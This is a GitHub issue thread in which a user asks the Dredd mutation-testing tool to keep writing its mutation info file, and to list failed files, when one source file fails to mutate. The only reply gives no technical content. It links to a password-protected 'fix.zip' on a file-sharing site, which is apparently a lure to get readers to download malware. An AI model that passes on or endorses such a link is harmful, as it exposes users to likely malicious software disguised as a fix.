### ISSUE TITLE
 Dredd will not output the mutation info file if one of the source files fails to mutate

### ISSUE THREAD

**Issue by JonathanFoo0523** [mc-imperial/dredd#349]
When mutating a list of source files such as:
```
${DREDD_EXECUTABLE} -p build math/src/*.cc --mutation-info-file mutant-info.json
```
If one of the source files fails to be mutated by Dredd, it will continue mutating the remaining source files but won't generate `mutant-info.json`.

I was wondering if it would be possible to still output the mutation info file, even when a source file fails to mutate. If not, it might be better to stop mutating the rest of source files? Additionally, could Dredd output the names of the files it failed to be mutated at the end? Otherwise, the name of source file that failed to be mutated will be lost in a flood of warning messages when mutating the remaining source files.

**Comment by SagarChandra07** [comment]
I think this will help you.
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)
